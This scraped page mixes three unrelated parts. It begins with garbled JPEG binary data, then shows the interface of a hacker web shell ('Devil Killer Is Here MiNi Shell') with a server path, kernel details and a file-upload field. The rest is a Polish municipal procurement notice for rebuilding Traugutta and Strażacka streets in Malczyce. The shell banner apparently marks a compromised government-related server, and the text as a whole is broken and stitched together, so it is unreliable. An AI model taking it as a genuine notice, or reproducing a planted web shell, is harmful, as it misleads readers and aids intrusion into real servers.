JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220315/0008703201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Traugutta oraz ulicy Strażackiej w Malczycach (ponowiony) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Malczyce</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Malczyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935023</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Traugutta 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@malczyce.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.malczyce.wroc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Traugutta oraz ulicy Strażackiej w Malczycach (ponowiony) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d61f3a67-a48c-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00087032</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040966/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa ulicy Traugutta oraz ulicy Strażackiej w Malczycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://malczyce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja elektroniczna w<br/>zakresie przekazywania sobie przez strony postępowania informacji, oświadczeń, wniosków,<br/>zawiadomień – za pośrednictwem platformy zakupowej znajdującej się pod adresem:<br/>https://malczyce.ezamawiajacy.pl w zakładce „Korespondencja”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, składa się w formie<br/>elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub w<br/>formie dokumentowej, w zakresie i w sposób określony w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).<br/>2. Komunikacja elektroniczna w zakresie przekazywania sobie przez strony postępowania informacji,<br/>oświadczeń, wniosków, zawiadomień – za pośrednictwem platformy zakupowej znajdującej się pod<br/>adresem: https://malczyce.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>3. Ogólne zasady korzystania z Platformy:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://malczyce.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl , gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w w/w potwierdzeniu.<br/>4. po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem<br/>zakładki „Korespondencja”,<br/>5. Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy zakupowej przez opcję „zadaj pytanie” lub przy użyciu zakładki<br/>„korespondencja”. w celu zadania pytania Wykonawca klika lewym przyciskiem myszy klawisz „ZADAJ PYTANIE” i uzupełnia dane Wykonawcy, temat i treść pytania, następnie klika klawisz „POTWIERDŹ”.<br/>Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy „PYTANIE WYSŁANE”. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Treść zapytań wraz z wyjaśnieniami, modyfikacje SWZ Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej prowadzonego postępowania – Platformie zakupowej. Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: Stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;/ Komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;/<br/>zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;/ Włączona obsługa JavaScript;/ Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf<br/>6. Oferta, oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>7. Składanie ofert, wniosków, zapytań możliwe jest tylko i wyłącznie za pośrednictwem w/w platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Przebudowa ulicy Traugutta w Malczycach”.<br/>Ulica Traugutta - droga złej jakości nawierzchni asfaltowej, z licznymi ubytkami. Zakres prac<br/>obejmuje całkowitą przebudowę pasa drogowego, chodników, poboczy, odwodnienia drogi,<br/>budowę nowej sieci wodociągowej wraz z przyłączeniami oraz remontu placu postojowego z<br/>uwagi na konieczność poprawy złego stanu technicznego. Droga Strażacka posiada obecnie na<br/>całej długości i szerokości nawierzchnię tłuczniową. Natężony ruch pojazdów, w tym również<br/>samochodów ratownictwa pożarniczego, powoduje konieczność corocznego uzupełniania<br/>powstałych ubytków w nawierzchni.<br/>Ulica Traugutta to jezdnia z wyodrębnionymi chodnikami i zjazdami na drogi gminne oraz<br/>indywidualne. Znajdują się na niej pobocza, odwodnienie oraz plac postojowy z czterema<br/>stanowiskami postojowymi. Teren pokryty roślinnością niską (krzewy) oraz wysoką (drzewa),<br/>która nie wymaga wycięcia. Nie występuje żadna roślinność prawnie chroniona. Odwodnienie<br/>przedmiotowego terenu odbywa się powierzchniowo oraz poprzez istniejące wpusty deszczowe.<br/>Zadanie obejmuje budowę nowego wodociągu wraz z przyłączami, przebudowę pasa<br/>drogowego oraz remont placu postojowego w obrębie działek nr 458, 490/6, droga nr 104810D<br/>w miejscowości Malczyce. Parametry przedmiotowej inwestycji: długość jezdni – 437mb,<br/>szerokość pasów ruchu – 2 x 2,5m (zastosowano rozwiązania uspokajające ruch) długość<br/>chodników – 437mb; szerokość chodników – 2,23m, długość poboczy – 437mb; szerokość<br/>poboczy – 0,75m. Dla odbioru wód opadowych napływających z powierzchni jezdni, chodników<br/>oraz miejsc postojowych planuje się przebudowę istniejących wpustów deszczowych. Obecna<br/>sieć wodociągowa stalowa DN100 zlokalizowana jest w pasie drogowym ul. Traugutta i na<br/>gruntach prywatnych. Istniejąca sieć po wybudowaniu nowej zostanie wyłączona z użytkowania.<br/>W ramach realizacji zadania planuje się wykonanie przebudowy pasa drogowego poprzez<br/>wykonanie nawierzchni bitumicznej jezdni i zjazdów, wymianę nawierzchni chodników na kostkę<br/>betonową oraz remont czterech miejsc postojowych. Planuje się zapewnić jedno stanowisko<br/>postojowe dla samochodów osobowych, użytkowanych przez osoby niepełnosprawne.<br/>Inwestycja nie klasyfikują się do przedsięwzięć mogących potencjalne lub znacząco oddziaływać<br/>na środowisko.<br/>Szczegółowy opis zamówienia znajduje się w dokumentacji projektowo - kosztorysowej<br/>stanowiącej załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji powyżej 36 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ nr 2 „Przebudowa ulicy Strażackiej w Malczycach”<br/>Ulica Strażacka posiada nawierzchnię tłuczniową. Na całej długości drogi wybudowana została<br/>kanalizacja sanitarna. Po przeprowadzonej inwestycji nie wykonano nowej nawierzchni drogi. Na<br/>terenie inwestycji nie występuje żadna roślinność prawnie chroniona. Nie zachodzi konieczność<br/>wycinki drzew ani krzewów. Długość planowanej inwestycji liniowej wynosi łącznie ok. 400,0m.<br/>Inwestycja nie klasyfikują się do przedsięwzięć mogących potencjalne lub znacząco oddziaływać<br/>na środowisko.<br/>Szczegółowy opis zamówienia znajduje się w dokumentacji projektowo - kosztorysowej<br/>stanowiącej załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji powyżej 36 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część nr 1<br/>1) Zamawiający uzna warunek za spełniony, w sytuacji gdy Wykonawca wykaże, że dysponuje<br/>następującymi osobami:<br/>a) kierownik robót specjalności drogowej,<br/>minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie:<br/>(1) doświadczenie - jako kierownik robót specjalności drogowej - przy realizacji minimum 1<br/>zadania polegającego na budowie lub przebudowie lub rozbudowie lub remoncie drogi lub ulicy<br/>wraz z infrastrukturą podziemną czyli wodociągową,<br/>(2) uprawnienia do kierowania robotami budowlanymi zgodnie z ustawą – Prawo budowlane w<br/>specjalności inżynieryjnej drogowej bez ograniczeń, lub odpowiadające im ważne uprawnienia,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) kierownik robót specjalności wodociągowych i kanalizacyjnych,<br/>minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie:<br/>(1) doświadczenie - jako kierownik robót specjalności wodociągowych i kanalizacyjnych - przy<br/>realizacji minimum 1 zadania polegającego na budowie lub przebudowie lub rozbudowie lub<br/>remoncie drogi lub ulicy wraz z infrastrukturą podziemną czyli wodociągową,<br/>(2) uprawnienia do kierowania robotami budowlanymi zgodnie z ustawą – Prawo budowlane w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, lub odpowiadające im ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Wykonawca może dysponować osobami, których odpowiednie kwalifikacje zawodowe, zdobyte<br/>w innych państwach, zostały uznane zgodnie z art. 12 a ustawy Prawo Budowlane na zasadach<br/>określonych w przepisach odrębnych, tj. m. in. ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2020 r. poz.<br/>220 ze zm.).<br/>2) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną<br/>wiedzę i doświadczenie do wykonania przedmiotu zamówienia: tj. wykonał w okresie ostatnich 5<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie,<br/>co najmniej jedną robotę budowlaną związaną z przebudową/budową/remontem dróg o<br/>nawierzchni bitumicznej o wartości nie niższej niż 1 mln zł brutto, oraz jedną robotę budowlaną<br/>związaną z przebudową/budową/remontem instalacji wodociągowej/kanalizacyjnej o wartości nie<br/>niższej niż 250 tys zł brutto.&#34;<br/>Część nr 2<br/>1) Zamawiający uzna warunek za spełniony, w sytuacji gdy Wykonawca wykaże, że dysponuje<br/>osobą:<br/>a) kierownik robót specjalności drogowej,<br/>minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie:<br/>(1) doświadczenie - jako kierownik robót specjalności drogowej - przy realizacji minimum 1<br/>zadania polegającego na budowie lub przebudowie lub rozbudowie lub remoncie drogi lub ulicy<br/>wraz z infrastrukturą podziemną czyli kanalizacją deszczową,<br/>(2) uprawnienia do kierowania robotami budowlanymi zgodnie z ustawą – Prawo budowlane w<br/>specjalności inżynieryjnej drogowej bez ograniczeń, lub odpowiadające im ważne uprawnienia,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>Wykonawca może dysponować osobami, których odpowiednie kwalifikacje zawodowe, zdobyte<br/>w innych państwach, zostały uznane zgodnie z art. 12 a ustawy Prawo Budowlane na zasadach<br/>określonych w przepisach odrębnych, tj. m. in. ustawie o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2020 r. poz.<br/>220 ze zm.).<br/>2) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną<br/>wiedzę i doświadczenie do wykonania przedmiotu zamówienia: tj. wykonał w okresie ostatnich 5<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, co najmniej 2 roboty budowlane związane z przebudową/budową/remontem dróg<br/>o nawierzchni bitumicznej o wartości nie niższej niż 500.000,00 mln zł brutto każda robota;.<br/>Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs<br/>przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania<br/>ogłoszenia o zamówieniu, przy czym średnie kursy walut dostępne są pod następującym<br/>adresem internetowym: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, w zakresie braku<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w zakresie przesłanek, o<br/>których mowa w art. 108 ust. 1 ustawy Pzp - wzór oświadczenia stanowi Załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami 